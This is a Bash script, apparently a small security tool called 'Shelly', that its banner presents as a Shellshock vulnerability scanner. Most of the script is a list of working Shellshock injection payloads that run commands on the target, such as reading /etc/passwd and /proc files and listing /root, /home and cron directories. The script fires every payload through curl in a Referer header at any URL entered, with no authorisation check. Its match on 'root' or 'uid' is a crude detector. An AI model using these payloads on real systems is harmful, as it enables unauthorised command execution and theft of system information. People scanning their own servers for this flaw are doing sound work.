#!/bin/bash
print_color() {
    color=$1
    text=$2
    echo -e "${color}${text}\e[0m"
}

# Function to display ASCII art for tool name
display_ascii_art() {
    cat << "EOF"

                                                           
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣀⣠⣴⣶⣶⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣶⣤⣀⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⣴⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⣠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⢠⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢿⡿⣻⢛⣿⣫⢯⣄⡽⣟⡿⣛⠿⣿⣿⣿⣿⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⢠⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⠿⣻⣍⣥⣾⣾⣯⣿⣿⣿⣿⣿⣿⣿⣾⣷⣾⣵⣭⣺⣕⣻⢙⡻⣦⣄⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⢀⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⢟⣥⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣽⣿⣦⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⣼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠟⡟⣵⣷⣶⣿⣿⣿⣿⣿⣿⣿⠟⠛⡟⠻⡍⠛⠻⡟⢻⡟⠿⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⡀⠀⠀⠀⠀⠀⠀⠀
⢰⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠟⣱⣾⣿⣿⣿⣿⣿⡿⢻⡟⠁⠀⠈⣇⠀⣿⠀⠻⡄⠀⠸⡄⢳⡀⠸⡆⠙⢿⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣦⠀⠀⠀⠀⠀⠀
⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⢫⣵⣷⣿⣿⣿⣿⣿⡿⢻⡏⢠⡞⠀⠀⠀⠀⢹⡄⠘⡄⠀⠻⣄⠀⢱⡌⢣⠀⢷⠀⠀⢷⠀⠻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣄⠀⠀⠀⠀
⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⢣⣤⣿⣿⣿⣿⣿⣿⠛⣽⠁⣼⢠⡞⠀⠀⠀⠀⠀⠀⢿⡀⣿⠀⠀⠹⣆⠀⢳⡼⡇⠀⢧⠀⠀⣧⠀⠘⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⠀⠀⠀
⢸⣿⣿⣿⣿⣿⣿⣿⣿⢋⣤⣾⣿⣿⣿⣿⡿⣿⠀⢀⡏⢠⠇⡜⠁⠀⠀⠀⠀⠀⠀⠀⢻⡘⣆⠀⠀⠈⢣⡀⢳⣼⡆⠘⣦⠀⠘⡆⡆⠈⣟⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣆⠀⠀
⢸⣿⣿⣿⣿⣿⣿⠟⢡⣿⣿⣿⣿⣿⣿⠏⠀⡏⠀⣸⠀⣼⣸⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⢿⡄⠀⠀⠀⠻⣄⣻⣻⣦⠘⣦⠀⢿⢿⠀⢸⡼⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣇⠀
⢸⣿⣿⣿⣿⡿⣻⣾⣿⣿⣿⣿⣿⣿⡇⠀⠀⡇⠀⣿⢠⢇⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠙⠂⠀⠀⠀⠈⢳⣷⣿⣦⠘⣦⠘⣾⠀⠘⡇⢻⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀
⠈⣿⣿⣿⡿⣱⣿⣿⣿⣿⣿⣿⡟⣸⠃⠀⠀⡇⠀⡏⣼⣾⠀⢀⣀⣀⣀⣀⣀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⠽⣮⢿⣦⠘⣆⣿⡇⠀⣇⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⡿⠀
⠀⢹⣿⣏⣾⣿⣿⣿⣿⣿⣿⡟⢡⠇⠀⢠⡆⡇⠀⡇⣇⠗⠋⠉⠉⠉⠈⠉⠉⠁⠀⠀⠀⠀⠀⠀⠀⠀⣀⡔⠉⠁⠀⠈⠛⣶⢧⣹⣽⡇⠀⢸⢸⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀
⠀⢘⣿⣿⣿⣿⣿⣿⣿⣿⣿⢡⡞⠀⢠⣿⣿⣷⠀⡇⣿⠀⠀⠀⠀⠀⠀⢀⡄⠀⠀⠀⠀⠀⠀⠀⠀⣸⠏⠀⠀⢀⣀⣀⣀⠘⣧⡻⣿⡇⠀⢸⣾⣿⣿⣿⣿⣿⣿⣿⣿⣿⠃⠀⠀
⠀⣸⣿⣿⣿⣿⣿⣿⣿⣿⢣⠟⢀⡰⣻⢫⣏⣿⢀⠇⣯⠀⣠⠴⣿⢫⣽⡿⠤⠀⠀⠀⠀⠀⠀⠀⢸⠇⠀⣠⢴⣫⣿⢭⣭⠿⢯⣁⣹⡇⠀⢸⣿⣿⣿⣿⣿⣿⣿⣿⡿⠁⠀⠀⠀
⢸⣿⣿⣿⣿⣿⣿⣿⣿⡿⣯⡠⢞⡽⢣⢿⣿⢹⣸⡀⣨⠞⣧⣴⣿⡿⠿⠿⡷⠄⠀⠀⠀⠀⠀⠀⢸⠀⠈⢱⡾⠗⠛⠛⠿⣷⡿⠁⢸⡇⠀⢸⢻⣿⣿⣿⣿⣿⣿⠟⠁⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⠁⢠⢶⣞⡵⠋⢸⣿⠈⢧⠷⠁⣴⡿⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠸⡇⠀⠈⠀⠀⠀⠀⠀⠉⠀⠀⣸⡇⠀⡞⣾⣿⣿⣿⣿⠟⠁⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⠀⡎⢠⣟⢧⡸⢹⣿⠀⠈⠉⠸⠟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣹⡆⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠁⢸⢿⣿⣿⡿⠋⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⠠⣧⠘⡏⢷⡱⣞⡟⣄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⡴⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⣿⢀⡞⡼⠛⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⣻⡆⠱⠴⣷⡸⣿⣿⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠁⢀⣀⣀⡀⠀⠀⠀⠀⠀⠀⣿⠇⣸⣻⠃⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣯⢳⡀⢸⣍⣧⣬⢿⣷⠀⠀⠀⠀⠀⠀⠀⠀⠐⣶⡶⠶⠶⠶⠒⠒⠚⠉⢉⣉⣽⠃⠀⠀⠀⠀⠀⣼⠏⢠⢷⠇⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⢹⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣧⡙⢦⣌⡙⠓⠦⣽⣦⠀⠀⠀⠀⠀⠀⠀⠀⠈⢷⣦⣤⣤⣤⣶⣿⣿⣿⣿⠋⠀⠀⠀⠀⠀⣠⡟⢀⣿⣿⡄⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣿⣶⣬⣙⠛⠒⣦⣿⣧⣄⠀⠀⠀⠀⠀⠀⠀⠀⠙⠻⣥⣀⣀⢀⣸⡿⠃⠀⠀⠀⠀⢀⣾⣿⢁⣿⣟⡀⠙⢶⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠙⠻⠿⣿⣿⣿⣿⣿⣿⣿⣿⣷⣮⣙⠛⢦⣬⣿⠙⢷⣤⣄⠀⠀⠀⠀⠀⠀⠀⠀⣌⣉⣉⣥⠶⠀⠀⠀⣠⣴⣿⣽⢣⢿⣿⣄⠙⢳⣄⠙⠛⢶⣤⡀⠀⠀⠀⠀⠀⠀⠀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⠙⠛⠦⣬⣧⣿⡹⣯⣿⡶⣤⣤⣀⠀⠀⠀⠀⠀⠀⠀⠀⢀⣠⡞⡿⣿⡿⣡⣻⣿⣿⠈⠻⣆⠘⢳⡄⠀⠈⠙⠷⣶⢄⡤⠰⠤⡤⢤
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡤⠖⠿⣿⢹⣟⢳⣧⣧⡏⡿⡟⣿⣶⣤⣤⢶⣾⣿⣿⢻⢻⡟⣽⣧⠋⢻⡸⣄⠀⠘⢧⡄⠙⢦⡀⠀⠀⠀⠙⢶⣟⠛⢺⡟
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠴⠛⠉⣠⠴⢻⡇⢸⣸⡆⠙⠻⣷⣷⣷⣿⣿⢸⢸⢸⢻⢻⡏⣦⠟⠁⣼⠛⠓⣤⣳⣽⡤⠔⠦⢽⣆⡈⣧⠀⠀⠀⠀⠀⠘⢷⡀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⢀⡴⠋⠁⠀⣤⡿⠁⠀⢸⠇⣏⣧⣹⡄⠀⠉⠙⠙⠛⣿⣽⣿⣏⡇⠣⣹⠏⣠⡞⠁⠀⠀⠀⠙⠋⠀⠀⠀⢀⣾⣧⢹⣧⡀⠀⠀⠀⠀⠈⣷⠀
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣠⠞⠁⠀⣠⢻⡟⠀⠀⠀⡿⣸⢻⢿⠟⣧⠀⠀⠀⠀⠀⠀⠀⠉⢻⡇⡼⠃⣰⠋⡇⠀⠀⠀⠀⠀⠀⠀⠀⣠⠞⠸⡟⡇⠻⡿⡄⠀⠀⠀⠀⠸⡇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣰⠇⠀⠀⡼⢡⠟⠀⠀⠀⣼⢱⢧⢇⡞⠀⣸⠀⠀⠀⠀⠀⠀⢀⡴⠛⠛⠳⣤⣧⠞⠁⠀⠀⠀⠀⠀⠀⣀⣰⣇⡀⠀⣷⣹⡀⢻⣻⡀⠀⠀⠀⠀⣇
⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⠇⠀⠀⡞⢡⡟⠀⠀⢀⣴⡷⣻⣿⡾⠧⠤⣿⠀⠀⠀⠀⢀⡴⠋⠀⠀⠀⠀⠀⠀⠀⢀⣤⣾⣿⣾⡿⢭⣿⣟⢦⣄⠀⠸⣧⡇⠀⡇⣧⠀⠀⠀⡸⡻
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣸⠇⠀⠀⢸⢣⡎⠀⠀⣠⣾⠏⢀⡞⠉⢀⣠⣤⡏⠀⠀⠀⠀⠘⢷⣄⠀⠀⠀⠀⠀⣠⣶⡿⠋⠀⠀⠀⠀⠀⠀⠈⠓⢮⣷⣦⣿⢧⡀⡇⣿⠀⠀⡸⢡⠃
⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⠀⠀⠀⢸⢸⠁⠀⢰⠟⠁⠀⠈⢹⣶⣞⣞⣾⡇⠀⠀⠀⠀⢀⣼⠏⠀⠀⢀⣴⢾⣷⠏⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⢻⣾⢶⣹⡀⡏⠀⣸⠁⡀⠀
⠀⠀⠀⠀⠀⠀⠀⠀⣸⣿⠀⠀⠀⢺⣼⡄⠀⡏⠀⢀⣀⣠⠞⣻⣿⣿⡿⠁⠀⠀⠀⠰⣿⠁⠀⢀⡴⣻⢟⡾⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣿⡶⡋⣱⠁⢠⠃⢠⠁⠀
⠀⠀⠀⠀⠀⠀⠀⣴⢋⣿⡀⠀⠀⠈⢧⠻⣄⢷⡾⠋⠉⠁⣾⣿⣸⡟⠁⠀⠀⠀⠀⢀⠾⠀⣴⠻⣷⢧⡞⠁⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠈⣷⣵⡿⠀⣸⠀⠈⠀⠀
⠀⠀⠀⠀⠀⠀⢸⠁⡞⠙⣷⡀⠀⠀⢸⡇⣿⣸⡄⠀⠀⢠⣧⣿⡟⠀⠀⠀⢀⡴⠞⢉⣠⠾⣿⣶⣧⡟⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⠀⣿⢣⠁⠀⢻⠀⢸⡆⠀⠀⠀⠀                         
███████ ██   ██ ███████ ██      ██      ██    ██ 
██      ██   ██ ██      ██      ██       ██  ██  
███████ ███████ █████   ██      ██        ████   
     ██ ██   ██ ██      ██      ██         ██    
███████ ██   ██ ███████ ███████ ███████    ██    
                                                 
                                                 
                                                  


+-------------------------------------------------------+
|                                                       |
|        Shelly - Shellshcock vul scanner              |        
|        Author: Ajansha Shankar                        |    
|        LinkedIn: Ajansha Shankar                      |      
|        GitHub: https://github.com/ajansha             |   
+-------------------------------------------------------+

                                    
EOF
}


shellshock_finder() {
    payloads=(
        '() { :;}; /usr/bin/id'
        '() { :;}; /usr/bin/touch /tmp/shellshock_test'
        '() { :;}; /usr/bin/whoami'
        '() { :;}; /usr/bin/ls /tmp'
        '() { :;}; /usr/bin/pwd'
        '() { :;}; /bin/cat /etc/passwd'
        '() { :;}; /bin/ls /etc'
        '() { :;}; /bin/hostname'
        '() { :;}; /bin/uname -a'
        '() { :;}; /bin/df -h'
        '() { :;}; /bin/netstat -an'
        '() { :;}; /bin/ps aux'
        '() { :;}; /bin/grep root /etc/passwd'
        '() { :;}; /bin/grep bash /etc/passwd'
        '() { :;}; /bin/grep bin /etc/passwd'
        '() { :;}; /bin/grep daemon /etc/passwd'
        '() { :;}; /bin/grep adm /etc/passwd'
        '() { :;}; /bin/grep -v root /etc/passwd'
        '() { :;}; /bin/grep -v bash /etc/passwd'
        '() { :;}; /bin/grep -v bin /etc/passwd'
        '() { :;}; /bin/grep -v daemon /etc/passwd'
        '() { :;}; /bin/grep -v adm /etc/passwd'
        '() { :;}; /usr/bin/grep root /etc/passwd'
        '() { :;}; /usr/bin/grep bash /etc/passwd'
        '() { :;}; /usr/bin/grep bin /etc/passwd'
        '() { :;}; /usr/bin/grep daemon /etc/passwd'
        '() { :;}; /usr/bin/grep adm /etc/passwd'
        '() { :;}; /usr/bin/grep -v root /etc/passwd'
        '() { :;}; /usr/bin/grep -v bash /etc/passwd'
        '() { :;}; /usr/bin/grep -v bin /etc/passwd'
        '() { :;}; /usr/bin/grep -v daemon /etc/passwd'
        '() { :;}; /usr/bin/grep -v adm /etc/passwd'
        '() { :;}; /bin/echo vulnerable'
        '() { :;}; /bin/echo -e "Content-Type: text/html\n\n<H1>Test</H1>"'
        '() { :;}; /bin/cat /proc/version'
        '() { :;}; /bin/cat /proc/cpuinfo'
        '() { :;}; /bin/cat /proc/meminfo'
        '() { :;}; /bin/ls -l /usr/bin'
        '() { :;}; /bin/ls -l /usr/sbin'
        '() { :;}; /bin/ls -l /bin'
        '() { :;}; /bin/ls -l /sbin'
        '() { :;}; /bin/ls -l /etc'
        '() { :;}; /bin/ls -l /var/log'
        '() { :;}; /bin/ls -l /var/spool/cron'
        '() { :;}; /bin/ls -l /var/spool/cron/crontabs'
        '() { :;}; /bin/ls -l /root'
        '() { :;}; /bin/ls -l /home'
        '() { :;}; /bin/ls -l /tmp'
        '() { :;}; /bin/ls -l /var/tmp'
        '() { :;}; /bin/ls -alR /etc'
        '() { :;}; /bin/ls -alR /var/log'
        '() { :;}; /bin/ls -alR /var/spool'
        '() { :;}; /bin/ls -alR /root'
        '() { :;}; /bin/ls -alR /home'
        '() { :;}; /bin/ls -alR /tmp'
        '() { :;}; /bin/ls -alR /var/tmp'
    )

    url=$1
    vulnerable=false

    for payload in "${payloads[@]}"; do
    headers="Referer: $payload"
    response=$(curl -s -H "$headers" "$url")
    if [[ $response == *"root"* || $response == *"$payload"* ||$response == *"uid"* ]]; then
        echo "$url is vulnerable with payload: $payload"
    else
        echo "$url is not vulnerable"
    fi
done
}
display_ascii_art
read -p "Enter the URL to test for shellshock vulnerability: " url

if [[ -z $url ]]; then
    echo "URL cannot be empty."
    exit 1
fi

shellshock_finder "$url"
